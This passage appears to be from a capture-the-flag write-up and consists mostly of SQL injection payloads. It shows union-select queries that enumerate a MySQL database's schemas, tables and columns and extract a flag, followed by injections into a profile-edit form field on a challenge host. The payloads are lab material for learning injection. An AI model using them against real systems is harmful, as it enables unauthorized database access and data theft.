' union select * from (select database()) from information_schema.tables ) a join (select version() ) b %23
' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_name='users') a join (select version() ) b %23
' union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23
http://246ec0b9b99b49e0b389942159f82cedd0c28f2815984231.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select version()) where uid=3%23
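Then we refresh the personal profile page, and the version number is indeed echoed back.
Now that we have found the injection point, we can carry out the injection.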
truename=xxxx%0000&Limitword[000]=&email[email protected]&provinceid=,address=(select group_concat(distinct(table_schema)) from information_schema.tables) where uid=3 %23
truename=xxxx%0000&Limitword[000]=&email[email protected]&provinceid=,address=(select group_concat(distinct(table_name)) from information_schema.tables where table_schema=database()) where uid=3 %23
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=,address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23